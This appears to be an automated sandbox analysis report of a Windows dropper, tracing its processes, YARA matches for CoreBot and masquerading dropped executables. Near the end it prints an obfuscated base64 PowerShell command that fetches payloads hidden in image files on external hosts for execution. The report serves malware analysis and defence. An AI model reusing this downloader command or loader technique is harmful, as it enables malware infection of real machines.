                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F735300_2_00007FF761F73530
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71C0C0_2_00007FF761F71C0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_012E11708_2_012E1170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_012EE4988_2_012EE498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_012E2B108_2_012E2B10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_012E11628_2_012E1162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_05FE6C288_2_05FE6C28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_05FEC6A88_2_05FEC6A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_05FED2C08_2_05FED2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_05FE0EA78_2_05FE0EA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_05FE16588_2_05FE1658
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_05FE16498_2_05FE1649
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_05FEC9F08_2_05FEC9F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_05FE82808_2_05FE8280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_011D316816_2_011D3168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_011D5EE116_2_011D5EE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_011D315A16_2_011D315A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_011D1E4C16_2_011D1E4C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 18_2_007A2C2818_2_007A2C28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 18_2_007A5BE018_2_007A5BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 18_2_007A1E2F18_2_007A1E2F
                  Source: 3lhrJ4X.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6606 bytes, 1 file, at 0x2c +A "67784c48226c6.vbs", ID 1163, number 1, 1 datablock, 0x1503 compression
                  Source: 3lhrJ4X.exeStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                  Source: 3lhrJ4X.exeBinary or memory string: OriginalFilename vs 3lhrJ4X.exe
                  Source: 3lhrJ4X.exe, 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 3lhrJ4X.exe
                  Source: 3lhrJ4X.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 3lhrJ4X.exe
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5344
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2005
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5344Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2005Jump to behavior
                  Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                  Source: 6.2.powershell.exe.1d3bba895c8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                  Source: Process Memory Space: powershell.exe PID: 7840, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: windows media player.exe.8.dr, TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                  Source: windows media player.exe.8.dr, OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                  Source: windows media player.exe.8.dr, TaskLoader.csTask registration methods: 'CreateTask'
                  Source: windows media player.exe.8.dr, RegisteredTaskObjectCacheBase.csTask registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                  Source: windows sidebar.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows sidebar.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows sidebar.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows photo viewer.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows photo viewer.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows photo viewer.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows multimedia platform.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows multimedia platform.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows multimedia platform.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows nt.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows nt.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows multimedia platform.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows multimedia platform.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows media player.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows media player.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows media player.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows sidebar.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows sidebar.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows portable devices.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows portable devices.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows photo viewer.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows photo viewer.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows nt.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows nt.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows nt.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows media player.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windows media player.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, Options.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, Options.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windows portable devices.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windows portable devices.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windows portable devices.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windowspowershell.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: windowspowershell.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: windowspowershell.exe.8.dr, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: windowspowershell.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: windowspowershell.exe.8.dr, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: MSBuild.exe, 00000010.00000002.2292012292.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\*.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                  Source: MSBuild.exe, 00000010.00000002.2287270604.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\system32\<.slnelR
                  Source: MSBuild.exe, 00000010.00000002.2292012292.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2376747462.0000000002401000.00000004.00000800.00020000.00000000.sdmp, windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: *.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
                  Source: MSBuild.exe, 00000012.00000002.2376747462.0000000002401000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3C:\Windows\Microsoft.NET\Framework\v4.0.30319\*.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: /ignoreprojectextensions:.sln
                  Source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                  Source: classification engineClassification label: mal100.spre.troj.expl.evad.mine.winEXE@64/37@3/4
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F7473C CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00007FF761F7473C
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F71C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF761F71C0C
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F76CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF761F76CA4
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F75D90 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF761F75D90
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3588:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67784c48226c6.vbs
                  Source: 3lhrJ4X.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                  Source: unknownProcess created: C:\Users\user\Desktop\3lhrJ4X.exe "C:\Users\user\Desktop\3lhrJ4X.exe"
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67784c48226c6.vbs
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
